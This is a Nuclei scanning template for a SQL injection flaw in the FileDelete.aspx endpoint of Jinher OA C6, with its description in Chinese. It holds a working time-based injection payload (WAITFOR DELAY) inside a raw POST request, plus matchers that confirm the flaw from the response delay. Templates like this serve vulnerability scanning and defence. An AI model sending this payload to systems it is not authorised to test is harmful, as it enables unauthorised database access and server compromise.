id: jinher-oa-c6-FileDelete-sqli
info:
  name: 金和OA FileDelete.aspx SQL注入漏洞
  author: leadlife
  severity: high
  description: 金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和OA C6 FileDelete.aspx 接口处存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
  reference: 
    - https://www.yuque.com/lvguo-pibd8/fqbwsx/tbgl7mliw35qsg13
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    sqlmap:
    version:
  tags: sqli,jinher

http:
  - raw:  
      - |
        @timeout: 15s
        POST /c6/Jhsoft.Web.accept/FileDelete.aspx/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 43

        SlaveID=-1')WAITFOR/**/DELAY'0:0:5'--/Temp/

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - duration >= 5 && duration < 9
        condition: and